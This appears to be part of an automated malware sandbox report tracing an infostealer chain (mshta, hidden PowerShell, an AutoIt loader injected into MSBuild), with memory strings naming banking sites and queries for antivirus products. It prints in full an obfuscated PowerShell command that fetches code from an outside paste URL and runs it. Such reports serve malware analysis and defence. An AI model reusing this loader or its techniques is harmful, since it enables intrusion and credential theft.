                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d
                    Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\SysWOW64\sppc.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\SysWOW64\Bcp47Langs.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\SysWOW64\USERENV.dll
                    Source: powershell.exe, 00000004.00000002.3838008180.000000000084C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTime-Stamp PCA 2010
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: updater.exe, updater.exe, 0000000E.00000002.1756900327.000000000158D000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1757721647.0000000001678000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1757319973.0000000001617000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1742138516.0000000001627000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1757319973.000000000163C000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1757145974.00000000015EC000.00000040.00000020.00020000.00000000.sdmp, AutoIt3.exe, AutoIt3.exe, 00000010.00000002.1899973326.0000000001027000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1900276497.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1893256271.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1893256271.0000000001116000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft hyper-v video
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: mshta.exe, 00000000.00000003.2570323059.000000000333D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ r
                    Source: powershell.exe, 00000002.00000002.2564889260.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3836559938.000000000105E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
                    Source: mshta.exe, 00000000.00000003.2570323059.000000000333D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: AutoIt3.exe, 00000015.00000002.1974864130.0000000001086000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmware
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeAPI call chain: ExitProcess graph end nodegraph_14-111690
                    Source: C:\faggbgb\AutoIt3.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_016041BF LdrInitializeThunk,14_2_016041BF
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_010345D5 BlockInput,14_2_010345D5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FD5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_00FD5240
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,14_2_00FF5CAC
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0103C6D9 LoadLibraryA,GetProcAddress,14_2_0103C6D9
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01615E16 mov eax, dword ptr fs:[00000030h]14_2_01615E16
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01603FBD mov eax, dword ptr fs:[00000030h]14_2_01603FBD
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01609EA2 mov eax, dword ptr fs:[00000030h]14_2_01609EA2
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01609EA9 mov eax, dword ptr fs:[00000030h] 14_2_01609EA9
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_010A7BFA mov eax, dword ptr fs:[00000030h] 16_2_010A7BFA
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_010A1D15 mov eax, dword ptr fs:[00000030h] 16_2_010A1D15
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_010A7C01 mov eax, dword ptr fs:[00000030h] 16_2_010A7C01
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_010B3B6E mov eax, dword ptr fs:[00000030h] 16_2_010B3B6E
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_010188CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,14_2_010188CD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_00FEA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00FEA385
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_00FEA354 SetUnhandledExceptionFilter,14_2_00FEA354
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_009CA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_009CA385
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_009CA354 SetUnhandledExceptionFilter,16_2_009CA354
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01019369 LogonUserW,14_2_01019369
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_00FD5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_00FD5240
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01021AC6 SendInput,keybd_event,14_2_01021AC6
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_010251E2 mouse_event,14_2_010251E2
                    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = Cg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
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\i1040gi.pdf"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\33260509\updater.exe "C:\Users\user\AppData\Local\Temp\33260509\updater.exe" C:\Users\user\AppData\Local\Temp\33260509\JfEljoTl.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\faggbgb\AutoIt3.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function cgmqb($seve){return -split ($seve -replace '..', '0x$& ')};$qbrr = cgmqb('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
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command cd;set-variable t8 (.(get-childitem variable:\e*onte*).value.invokecommand.(((get-childitem variable:\e*onte*).value.invokecommand|get-member|where-object{(get-variable _).value.name-ilike'*cm*t'}).name).invoke((get-childitem variable:\e*onte*).value.invokecommand.(((get-childitem variable:\e*onte*).value.invokecommand|get-member|where-object{(get-variable _).value.name-ilike'g*om*e'}).name).invoke('ne*ct',$true,1))net.webclient);sv s 'https://nopaste.net/sfhgtxfgtb';&(get-childitem variable:\e*onte*).value.invokecommand.(((get-childitem variable:\e*onte*).value.invokecommand|get-member|where-object{(get-variable _).value.name-ilike'*cm*t'}).name).invoke((get-childitem variable:\e*onte*).value.invokecommand.(((get-childitem variable:\e*onte*).value.invokecommand|get-member|where-object{(get-variable _).value.name-ilike'g*om*e'}).name).invoke('in*-ex*ion',$true,$true))([string]::join('',(((get-item variable:\t8).value.((((get-item variable:\t8).value|get-member)|where-object{(get-variable _).value.name-ilike'*nl*a'}).name).invoke((gci variable:\s).value)|foreach{(get-item variable:/_).value-as'char'}))))
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_010188CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,14_2_010188CD
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01024F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,14_2_01024F1C
                    Source: updater.exe, 0000000E.00000002.1759556958.0000000005C21000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1756660543.0000000001076000.00000002.00000001.01000000.0000000D.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005CFB000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: updater.exe, AutoIt3.exe | Binary or memory string: Shell_TrayWnd
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002E71000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q/explorer.exe &*&*& Program Manager &*&*& [WIN]rt-
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002E71000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Managerte
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_00FE885B cpuid 14_2_00FE885B
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,14_2_015F2ED5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: GetLocaleInfoA,GetACP,14_2_015F93F1
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: GetLocaleInfoA,14_2_015F37F9
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,14_2_015F2FDF
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: GetLocaleInfoA,14_2_015F7E59
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: GetLocaleInfoA,14_2_015F7EA5
                    Source: C:\faggbgb\AutoIt3.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_01090C2D
                    Source: C:\faggbgb\AutoIt3.exe | Code function: GetLocaleInfoA,GetACP,16_2_01097149
                    Source: C:\faggbgb\AutoIt3.exe | Code function: GetLocaleInfoA,16_2_01091551
                    Source: C:\faggbgb\AutoIt3.exe | Code function: GetLocaleInfoA,16_2_01095BB1
                    Source: C:\faggbgb\AutoIt3.exe | Code function: GetLocaleInfoA,16_2_01095BFD
                    Source: C:\faggbgb\AutoIt3.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_01090D37
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\faggbgb\AutoIt3.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
                    Source: C:\faggbgb\AutoIt3.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
                    Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01000030 GetLocalTime,__swprintf,14_2_01000030
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01000722 GetUserNameW,14_2_01000722
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_00FF416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,14_2_00FF416A
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_00FD5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,14_2_00FD5D13
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
